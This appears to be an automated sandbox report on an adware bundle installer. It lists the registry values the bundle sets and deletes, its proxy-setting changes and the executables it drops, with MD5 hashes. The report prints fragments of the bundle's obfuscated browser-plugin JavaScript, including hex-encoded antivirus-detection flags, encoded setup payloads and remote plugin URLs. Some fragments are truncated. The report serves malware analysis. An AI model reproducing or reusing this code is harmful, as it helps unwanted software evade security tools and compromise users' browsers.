    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
    "Version" = "4"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
    "AppName" = "App Lid-bg.exe"

    [HKLM\SOFTWARE\Wow6432Node\App Lid\IE\Profiles]
    "S-1-5-21-2858020935-2156992550-3658131804-1003" = "1"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/28.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
    "JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64玫Ŗ"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
    "Policy" = "3"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){Å–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
    "Version" = "7"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ODU2NTg0YjU2NDgwNDFmMDAxZjM3MDQxNDQ5NGM0YTRlMDMwMDFiMTI0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU1ZDE5NWEwYzBlMTkwZDBmMTAxODAzMDUwMDQxMGMxMzBjNDQxNzFhMWM0NDE4NDEwODA1NDcwODI3MmI1MTBkMTUwMzExMTM1ZTA4MTcwNzFjMGExZDA4MGMzZjFjNTYyOTM1MmYzOTNiM2MzMTI0MzEyZjMzMzgzMzI4MzUyMjMyMjkzMTJmMjkzNTRhMDgxYjFhMGMwMjBhMTIzNTA1MDgwZTQ5MzAzZDM1MmEyNDI1MzkzZTIyMzAyYTMwMjkzYjI0MjMyNDM4MzkyZDMwMjEzOTNjMmUyOTM1NGEwOTA2MDAxNTA1MWQxOTM1MDUwODBlNDkzMDNkMzUyYTI0MjUzOTNlMjIzMDJhMzAyOTNhMzkzOTNkM2YyZTI2MzAzZDUwMTkxYjA2MjMyODU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTIzMjgzNDJiNDkwMzA2MDgyNTE3MDcwOTU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTI0MmQyNjMxMzAzZDUwMzEyOTNmMjk1MTM0MmIyYzMwMzkyYjM4MjQyMzI4MmUyNjMwMmIzODJiM2YzNzI2MjAyZTI2MzAzNzI1M2QzOTI5MjMyODM0MmI0OTExMDMxYTIyMzI1NzMzMzQzNzNkMmQyNTJiMzkzZjJlMjkzOTJiMmEzYTIyM2QyNTMyMmYyODM0MjczYTIwMjkzMTJmMjkzNTRhMTk0OTMwM2QyNDM2MmYyOTM1NGU0NzdlNGY0MjU2NTg0OTFlMWUxODFiMDczYTEwMWE1YTUxNTY0ODA0MWYwMDFmMTE0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWUǐŖ"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDecisionTime" = "3E E0 8B ED 8E 3B D0 01"

    [HKCU\Software\InstalledBrowserExtensions\Lid]
    "65743" = "App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/22.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\46]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/46.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
    "Version" = "6"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/1.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\354]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/354.js"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
    "DisplayVersion" = "1.36.01.22"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
    "Name" = "firstoffer_right_slider_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/9.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
    "Name" = "nova_test_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
    "Version" = "2"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/38.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKLM\SOFTWARE\Wow6432Node\App Lid\IE]
    "TotalProfiles" = "1"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-Å–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "RunInFrame" = "true"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\180]
    "Version" = "12"
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
    "Name" = "guava_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
    "Version" = "4"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
    "Version" = "2"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/183.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
    "Name" = "bpo_serp_somo_m"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\25286]
    "65743" = "App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\195]
    "Version" = "28"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "Params" = "{ source_id : 000820, sub_id : 0, uzid : appshatmadness"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Application deletes the following registry key(s):

    [HKLM\SOFTWARE\Wow6432Node\Tempo]

    The Application deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadDetectedUrl"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoDetect"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDetectedUrl"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyServer"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"

    The process F365.tmp:3556 makes changes in the system registry.
    The Application creates and/or sets the following values in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
    "CachePrefix" = "Cookie:"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "AutoDetect" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDecision" = "0"
    "WpadDecisionTime" = "1A 3B 37 04 8F 3B D0 01"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadNetworkName" = "Network"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
    "CachePrefix" = "Visited:"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
    "CachePrefix" = ""

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDecisionReason" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadDecisionReason" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDetectedUrl" = ""

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "46 00 00 00 4D 00 00 00 09 00 00 00 00 00 00 00"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadDecision" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion]
    "%IS_PREREQCMD%-MyPDFConverter" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadDecisionTime" = "74 FE 43 07 8F 3B D0 01"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Application deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion]
    "%IS_PREREQ%-MyPDFConverter"
    "%IS_PREREQCMD%-MyPDFConverter"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadDetectedUrl"

    [HKCU\Software\Microsoft\Windows\CurrentVersion]
    "%IS_PREREQF%-MyPDFConverter"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoDetect"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDetectedUrl"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyServer"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "ProxyBypass"

    The Application disables automatic startup of the application by deleting the following autorun value:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    " ISSetupPrerequisistes"

    The process firsttime_setup.exe:3488 makes changes in the system registry.
    The Application creates and/or sets the following values in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\genieo]
    "NoModify" = "1"
    "URLInfoAbout" = "http://www.genieo.com/contact-us/"
    "DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe"
    "EstimatedSize" = "28672"
    "NoRepair" = "1"
    "HelpLink" = "http://www.genieo.com/faq"
    "Publisher" = "Genieo Innovation Ltd."
    "DisplayVersion" = "1.0.400"

    [HKCU\Software\Genieo\Components\FirstTime]
    "UninstallURL" = "http://www.genieo.com/uninstall"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\genieo]
    "UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe"
    "DisplayName" = "Genieo"

    The process MSIEXEC.EXE:3852 makes changes in the system registry.
    The Application creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
    "GlobalAssocChangedCounter" = "35"

    [HKCU\Software\Classes\Local Settings\MuiCache\2B\52C64B7E]
    "LanguageList" = "en-US, en"

    Dropped PE files

    MD5 File path
    54c7c9516ee9225c04d7e807ebcac565 c:\Program Files (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe
    c373d84f563ba4a541164d501b3a9a21 c:\Program Files (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.exe
    7e9eb548a991849d1b87077ab4f65cee c:\Program Files (x86)\App Lid\App Lid-bg.exe
    e0b472d12390ac79a68c33b6aeb10035 c:\Program Files (x86)\App Lid\App Lid-bho.dll
    a958fb3ab34e335b5c32f104e413e4be c:\Program Files (x86)\App Lid\App Lid-bho64.dll
    d1b974667c753c5e5c8596b64faaa14d c:\Program Files (x86)\App Lid\App Lid-buttonutil.dll
    16a62235ff5abb857606688f9247f47f c:\Program Files (x86)\App Lid\App Lid-buttonutil.exe
    908dd57732d0d18a431e848a774c80f2 c:\Program Files (x86)\App Lid\App Lid-buttonutil64.dll
    de2be3d4b8d8a1c22a758693441c8b64 c:\Program Files (x86)\App Lid\App Lid-buttonutil64.exe
    dcc00bbd6e1d67084a05c9afe3d27e48 c:\Program Files (x86)\App Lid\App Lid-codedownloader.exe
    81a36f0ac2a7c00607da4cb2db464a0c c:\Program Files (x86)\App Lid\Uninstall.exe
    ce937e28829377ba3c99d0b7c9369305 c:\Program Files (x86)\App Lid\utils.exe
    140e9a22abd09f57f5ee0181ada1dabb c:\Program Files (x86)\GPLGS\gsdll32.dll
    ae427b6cef5ba09ba3c72f8f3897a62e c:\Program Files (x86)\GPLGS\gswin32c.exe
    173b1563476d5b22df7ef4c0cc57e58d c:\Program Files (x86)\MyPDFConverter\CPWriter2.exe
    3e806636c4dc6727611a69e3418e260c c:\Program Files (x86)\MyPDFConverter\Preferences.exe
    a265887de685d2f8dbde8036064c61df c:\Program Files (x86)\MyPDFConverter\pdfwriter.exe
    173b1563476d5b22df7ef4c0cc57e58d c:\Program Files (x86)\MyPDFConverter\setup\CPWriter2.exe
    033430ca935c3b3b40dd19da6ff1e35f c:\Program Files (x86)\MyPDFConverter\setup\CUSTMON.DLL
    64cfbc94d91422a749f56d29f2c4bf89 c:\Program Files (x86)\MyPDFConverter\setup\Converter.exe
    a8c4d265f14c4f977c399d51971041b6 c:\Program Files (x86)\MyPDFConverter\setup\Driver\PS5UI.DLL
    28e60cef92843c1ea5c221ddc308b766 c:\Program Files (x86)\MyPDFConverter\setup\Driver\PSCRIPT5.DLL
    28e9ec320646cc0779422f5f9dc9129a c:\Program Files (x86)\MyPDFConverter\setup\Driver\PSMON.DLL
    1ede62e047f4bb3d0398eba367c16484 c:\Program Files (x86)\MyPDFConverter\setup\Driver\X64\PS5UI.DLL
    fb270d281f4929b9e0894afc816c9dbe c:\Program Files (x86)\MyPDFConverter\setup\Driver\X64\PSCRIPT5.DLL
    3e806636c4dc6727611a69e3418e260c c:\Program Files (x86)\MyPDFConverter\setup\Preferences.exe
    2417cecfd619a7007a638dc665fcc4fe c:\Program Files (x86)\MyPDFConverter\setup\Setup.exe
    7ee1622a8c253689140658670853498b c:\Program Files (x86)\MyPDFConverter\setup\custmon32.dll
    555321190ce25bdd169b11ed148b523d c:\Program Files (x86)\MyPDFConverter\setup\custmon64.dll
    1c3adacafdd5592d44b389e41cf32d54 c:\Program Files (x86)\MyPDFConverter\setup\pdfwriter.exe
    44927cc68afa6de8c7556d8a4614642b c:\Program Files (x86)\MyPDFConverter\setup\pdfwriter32.exe
    a265887de685d2f8dbde8036064c61df c:\Program Files (x86)\MyPDFConverter\setup\pdfwriter64.exe
    efa6b299508db852884ed95a93101273 c:\Program Files (x86)\MyPDFConverter\setup\unInstpw.exe
    ba4bac1fe450ec1107b1e897deba263c c:\Program Files (x86)\MyPDFConverter\setup\unInstpw64.exe
    ba4bac1fe450ec1107b1e897deba263c c:\Program Files (x86)\MyPDFConverter\unInstpw64.exe
    a7998c55467d4884cb509e5c4cfdcfa2 c:\Program Files (x86)\XTab\BrowerWatchCH.dll
    fbde6af89f9b351243c3f736a48a0543 c:\Program Files (x86)\XTab\BrowerWatchFF.dll
    5785680870eff9ba7b4f58c726552013 c:\Program Files (x86)\XTab\BrowserAction.dll
    77590ce0cdeb6bbee8dc056fea0b107c c:\Program Files (x86)\XTab\CmdShell.exe
    c04d8bc933470b3913e4e3e6c3115793 c:\Program Files (x86)\XTab\HPNotify.exe
    a330b7929278b18a33e29bd4bb69abc3 c:\Program Files (x86)\XTab\IeWatchDog.dll
    b32a88b91e59bfb553a9bebf78a1e567 c:\Program Files (x86)\XTab\ProtectService.exe
    fece5b81614bd16ff043051f338183a0 c:\Program Files (x86)\XTab\SupTab.dll
    3e29914113ec4b968ba5eb1f6d194a0a c:\Program Files (x86)\XTab\msvcp110.dll
    4ba25d2cbe1587a841dcfb8c8c4a6ea6 c:\Program Files (x86)\XTab\msvcr110.dll
    852f4db9b269f52c54f37568d703825e c:\Program Files (x86)\XTab\uninstall.exe
    a9f1ecb4159ecaf56bbe555f81374f25 c:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe
    23f833027e99b925ecb69fd095c89faf c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe
    66dd70b68ffc0b8c4e4f9262513299ad c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\setup[1].exe_a
    127bd1a9d6037e2f42e26a7d3d3032d5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\D79A.tmp
    2669e238e25a9dc08e50ca28c3364e10 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\F365.tmp
    d65611fbc4da8cea4e886076bec82d1e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\InstallGenieo.exe
    4ca158423c13f6f7ef8e1a0a745384f6 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe
    55bae15d523e4fabaa551023703d3fd9 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe
    c8ac9074c2dfd3814f656d1feca32129 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe
    518879abe3170dabd172dfffcd165598 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe
    ac8f7611f353ca9803fad5ff81900678 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\biclient.exe
    31f8d1cffb02dff93646f81d8ce3dd75 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_mystartsearch.exe
    4f9236be13917b89f7a03dea85f220fa c:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe
    d8ba5f4e6a1594d0e07c886dac0f5f8c c:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe
    ac81a34dd4d4b173fb78897fa6fe719f c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.exe
    e032af67bae3ef498bc50c9435310641 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\NativeUtils.dll
    58aa210b2188876b1beb1bb0e796ac20 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\genieutils.exe
    3d7d0dc1234271fd88618c571294ee64 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\x64\NativeUtils.dll
